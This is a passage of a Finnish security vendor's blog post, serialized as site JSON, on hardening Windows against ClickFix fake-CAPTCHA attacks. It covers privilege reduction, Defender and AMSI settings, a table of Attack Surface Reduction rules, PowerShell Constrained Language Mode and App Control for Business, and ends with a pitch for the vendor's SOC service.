Terminal.",[526,858,859,860,863],{},"Voitte lisäksi koventaa Edgeä ",[573,861,862],{},"DefaultClipboardSetting","-asetuksella, joka estää JavaScriptiä kirjoittamasta leikepöydälle hiljaa.",[552,865,867],{"id":866},"suojauslayer-4-suorituksen-estäminen","Suojauslayer 4: suorituksen estäminen",[526,869,558],{},[526,871,872],{},"Ennen edistyneitä ominaisuuksia laittakaa perusasiat kuntoon. ClickFixin osalta se tarkoittaa:",[824,874,827,875,827,881,827,887,827,893],{"style":826},[829,876,877,880],{},[832,878,879],{},"Local Admin Reduction:"," poistakaa paikalliset administrator-oikeudet loppukäyttäjiltä siellä missä mahdollista, jotta koodin suorituksen vaikutus rajautuu.",[829,882,883,886],{},[832,884,885],{},"Endpoint Privilege Management (EPM):"," antakaa käyttäjien työskennellä peruskäyttäjinä ja korottakaa vain hyväksytyt sovellukset policy-sääntöjen kautta.",[829,888,889,892],{},[832,890,891],{},"UAC-kovennus:"," tarkistakaa Secure Desktop -enforcement, kehotteiden käyttäytyminen administratoreille ja peruskäyttäjille sekä asennusohjelmien tunnistus.",[829,894,895,898],{},[832,896,897],{},"Credential Guard:"," eristäkää NTLM-hashit, Kerberos-tiketit ja muu credential-materiaali virtualisointipohjaisella turvallisuudella, jotta credential-varkaus pysyy vaikeana silloinkin, kun hyökkääjä saa admin-oikeudet.",[526,900,901],{},"Nämä kontrollit vähentävät eskalaatiomahdollisuuksia, suojaavat credentialeja ja pakottavat least privilege -periaatteen. Raja tulee tässä: ne rajaavat sitä, mitä kompromentoinnin jälkeen tapahtuu. Ne eivät estä infostealeria peruskäyttäjän kontekstissa lukemasta käyttäjälle luettavissa olevia evästeitä, istuntotokeneita ja sovellusten credential-storeja.",[526,903,904],{},"Sitten Microsoft Defender. Defender AV voi tunnistaa toisen vaiheen payloadin, mutta vain oikeilla asetuksilla: kytkekää Cloud Protection päälle ja asettakaa suojaustaso arvoon High tai High+. AMSI, Antimalware Scan Interface, antaa sovellusten luovuttaa sisältöä ajonaikaisesti Defenderille tarkistettavaksi sen jälkeen kun se on purettu tai deobfuskoitu muistissa, mutta ennen kuin se suoritetaan. PowerShell käyttää AMSI:a haittakoodin tunnistamiseen, ja AMSI tarvitsee reaaliaikaisen suojauksen ja Behavior Monitoringin.",[526,906,907],{},"Vähintään viisi Attack Surface Reduction -sääntöä on ClickFixin kannalta relevanttia:",[590,909,911],{"style":910},"margin: 0.5rem 0 2rem; overflow-x: auto",[912,913,827,915,827,934],"table",{"style":914},"width:100%; border-collapse: collapse; font-size: 0.85rem",[916,917,918,919,827],"thead",{},"\n    ",[920,921,922,923,922,928,922,931,918],"tr",{},"\n      ",[924,925,927],"th",{"style":926},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #dde1e4; text-align: left; font-weight: 600","Sääntö",[924,929,930],{"style":926},"GUID",[924,932,933],{"style":926},"ClickFix-relevanssi",[935,936,918,937,918,953,918,968,918,981,918,994,827],"tbody",{},[920,938,922,939,922,944,922,950,918],{},[940,941,943],"td",{"style":942},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #f6f8fa","Estä mahdollisesti obfuskoitujen skriptien suoritus",[940,945,947],{"style":946},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #f6f8fa; white-space: nowrap",[573,948,949],{},"5beb7efe-fd9a-4556-801d-275e5ffc04cc",[940,951,952],{"style":942},"Obfuskoidut tai koodatut skriptit suoritus- ja evaasiovaiheessa",[920,954,922,955,922,959,922,965,918],{},[940,956,958],{"style":957},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #ffffff","Estä JavaScriptiä tai VBScriptiä käynnistämästä ladattua suoritettavaa sisältöä",[940,960,962],{"style":961},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #ffffff; white-space: nowrap",[573,963,964],{},"d3e037e1-3eb8-44c8-a917-57927947596d",[940,966,967],{"style":957},"WSH, .js tai .vbs, jotka käynnistävät ladattuja payloadeja",[920,969,922,970,922,973,922,978,918],{},[940,971,972],{"style":942},"Salli suoritettavat tiedostot vain prevalenssi-, ikä- tai trusted-list-kriteerin perusteella",[940,974,975],{"style":946},[573,976,977],{},"01443614-cd74-433a-b99e-2ecdc07bfc25",[940,979,980],{"style":942},"Tuoreet tai harvinaiset levylle kirjoitetut executablet",[920,982,922,983,922,986,922,991,918],{},[940,984,985],{"style":957},"Estä suoritettava sisältö sähköpostiohjelmasta ja webmailista",[940,987,988],{"style":961},[573,989,990],{},"be9ba2d9-53ea-4cdc-84e5-9b1eeee46550",[940,992,993],{"style":957},"Sähköpostilla toimitetut ClickFix-variantit",[920,995,922,996,922,999,922,1004,918],{},[940,997,998],{"style":942},"Estä kaikkia Office-sovelluksia luomasta lapsiprosesseja",[940,1000,1001],{"style":946},[573,1002,1003],{},"d4f940ab-401b-4efc-aadc-ad5f3c50688a",[940,1005,1006],{"style":942},"Office-houkutinvariantit, jotka käynnistävät interpretereitä",[526,1008,1009],{},"Rullatkaa ASR ensin audit-tilassa, sitten pilottina, sitten block-tilassa. Tamper Protection on viimeinen linja: se estää hyökkääjää sammuttamasta teidän tunnistuksianne.",[526,1011,1012],{},"PowerShellissä itsessään vähennätte legacy-interpretereiden tuomaa riskiä. Identifioikaa ja poistakaa siellä missä se on toteutettavissa Windows PowerShell 2.0 ja legacy-VBScript-komponentit, joilta puuttuvat uudempien versioiden logging- ja security-ominaisuudet. Seuraava askel on Constrained Language Mode (CLM), joka rajoittaa PowerShellin käytettävissä olevia kielielementtejä ja estää monet skriptipohjaiset tekniikat. CLM:llä on robustia turva-arvoa vain silloin, kun system application control -policy pakottaa sen (App Control for Business); ympäristömuuttujan ja AppLockerin kautta toteutetut variantit ovat heikompia ja kierrettävissä. Ja monet järjestelmät tarvitsevat Full Language Modea toimiakseen, esimerkiksi ohjelmistojen deployment-tooling, minkä vuoksi CLM on usein toteutettavissa vain valituissa ympäristöissä.",[526,1014,1015],{},"Näin päädymme App Control for Businessiin (aiemmin WDAC). App Control pakottaa koodin integriteettipolicyn siitä, mitkä executablet, skriptit ja ajurit saavat ajaa. Strateginen asento on default-deny plus Microsoftin suosittelemat Block Rules, tunnettu LOLBin- ja bypass-estolista. App Control on myös oikea enforcement-polku PowerShellin CLM:lle. Script Enforcement estää MSHTA- ja MSXML-skriptihostit, pakottaa PowerShellin CLM:ään ja estää sallimattoman Windows Script Hostin käytön. Pari käyttäytymisfaktaa on tärkeää:",[824,1017,827,1018,827,1021,827,1024],{"style":826},[829,1019,1020],{},"Base Policyt, jotka luottavat Windowsiin, eivät estä luotettuja LOLBineja automaattisesti. Teidän täytyy mergetä Microsoftin suosittelemat Block Rules sisään, jotta tunnetut bypassit sulkeutuvat.",[829,1022,1023],{},"App Control ei estä allekirjoitetun powershell.exen tai cmd.exen käynnistymistä. Se rajoittaa sitä, mitä ne saavat tehdä (CLM, ei allekirjoittamatonta tai sallimatonta payloadia), eikä säätele cmd.exen, .batin tai .cmd:n sisältöä. Siksi se kerrostetaan ASR:n ja käynnistyksen kovennuksen kanssa, eikä käytetä yksinään.",[829,1025,1026],{},"Audit-tila ei ole neutraali: Script Enforcement estää auditissakin MSHTA:n ja MSXML:n suorituksen ja voi muuttaa PowerShellin CLM-käyttäytymistä. Siksi App Controlin täytyy auditissa olla ensimmäisestä käyttöönotosta lähtien pilotti- tai rengasrajattu, ei koskaan koko laitekannan laajuinen.",[526,1028,1029],{},"App Control on yksittäinen kontrolli, jolla on korkein confidence interpreter-, LOLBin- ja payloadin suoritusvaiheita vastaan, ja se pakottaa robustin CLM:n. Samalla se kantaa korkeimman deployment-kompleksisuuden ja korkeimman rollback-riskin, sillä virheellinen konfiguraatio estää suorituksen. Ottakaa se käyttöön hallittujen pilottirenkaiden kautta.",[552,1031,1033],{"id":1032},"missä-me-tulemme-kuvaan","Missä me tulemme kuvaan",[526,1035,558],{},[526,1037,1038,1039,804],{},"ClickFix on nopea, ja Microsoftin natiivit tunnistukset kattavat suurimman osan, mutta eivät kaikkea. CSOC-asiakkaillemme laajennamme kattavuutta jatkuvasti siellä, missä aukkoja ilmaantuu: suoritus Windows Terminalin kautta, RAT-vetoiset tuki-scamit ja post-compromise-käyttäytyminen. Jos haluatte tietää, missä teidän ympäristönne on, ",[1040,1041,1042],"a",{"href":276},"ottakaa yhteyttä",[1044,1045,1046],"style",{},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}",{"title":530,"searchDepth":531,"depth":531,"links":1048},[1049,1050,1051,1052,1053,1054,1055,1056,1057],{"id":554,"depth":531,"text":555},{"id":636,"depth":531,"text":637},{"id":648,"depth":531,"text":649},{"id":671,"depth":531,"text":672},{"id":783,"depth":531,"text":784},{"id":813,"depth":531,"text":814},{"id":850,"depth":531,"text":851},{"id":866,"depth":531,"text":867},{"id":1032,"depth":531,"text":1033},"post",{"lang":1060,"seoTitle":1061,"titleClass":1062,"date":1063,"categories":1064,"blogtitlepic":1066,"socialimg":1067,"customExcerpt":1068,"keywords":1069,"asideNav":1070,"published":325},"fi","ClickFix-hyökkäysten tunnistaminen ja estäminen: Win+R-liitostemppu","h2-font-size","2026-09-21",[1065],"Security","head-clickfix.jpg","/blog/heads/head-clickfix.jpg","ClickFix tekee käyttäjästä oman hyökkääjänsä: väärennetty CAPTCHA, yksi copy-paste, ja haittakoodi ajaa muistissa ilman että mitään päätyy levylle. Miten Microsoft Defender tunnistaa hyökkäyksen, missä tunnistus tulee rajoilleen ja miten te suljette aukon RunMRU-huntilla ja neljällä suojauslayerilla.","ClickFix, ClickFix-hyökkäys, ClickFix-tunnistus, ClickFixin estäminen, Fake CAPTCHA, Win+R-hyökkäys, RunMRU KQL, Microsoft Defender, Attack Surface Reduction, ASR-säännöt, App Control for Business, WDAC, Constrained Language Mode, Network Protection, AMSI, Endpoint Privilege Management, Infostealer, LOLBin, PowerShell-kovennus",{"menuItems":1071},[1072,1075,1078,1081,1084,1087,1090,1093,1096],{"href":1073,"text":1074},"#clickfix-hyökkäysketju","Hyökkäysketju",{"href":1076,"text":1077},"#mitä-microsoft-defender-havaitsee","Mitä Defender havaitsee",{"href":1079,"text":1080},"#missä-natiivi-tunnistus-tulee-rajoilleen","Missä se takkuaa",{"href":1082,"text":1083},"#aukon-sulkeminen-runmru-hunt","Aukon sulkeminen",{"href":1085,"text":1086},"#suojauslayer-1-toimituksen-estäminen","Layer 1: toimitus",{"href":1088,"text":1089},"#suojauslayer-2-tempun-estäminen","Layer 2: temppu",{"href":1091,"text":1092},"#suojauslayer-3-toiminnon-estäminen","Layer 3: toiminto",{"href":1094,"text":1095},"#suojauslayer-4-suorituksen-estäminen","Layer 4: suoritus",{"href":1097,"text":1033},"#missä-me-tulemme-kuvaan","/posts/2026-09-21-clickfix-prevent-detect",{"title":546,"description":530},"posts/2026-09-21-clickfix-prevent-detect",[1102,1103,1104],"Defender","SOC","Endpoint Security","ITRWHdeMy3Yxx9BYvNEm0ljNIgCJKT0IQ0THS5tBZRg",[],{"id":1108,"extension":1109,"meta":1110,"stem":8,"__hash__":1121},"authors_data/authors.json","json",{"Fritz Zurhorst":1111,"Nadine Klein":1116},{"display_name":521,"avatar":1112,"permalink":1113,"linkedin":1114,"imageOffsetTop":1115},"people/people-fritz-zurhorst.png","/authors/fritz-zurhorst","friedemann-z","72%",{"display_name":548,"avatar":1117,"permalink":1118,"twitter":1119,"linkedin":1120,"imageOffsetTop":1115},"people/people-nadine-kern.png","/authors/nadine-kern","nadineausRT","nadine-kern","1csawlkJxRljy93GTOnXEkwLqAv9Lcj-apxRvoodAOY",1791383968362]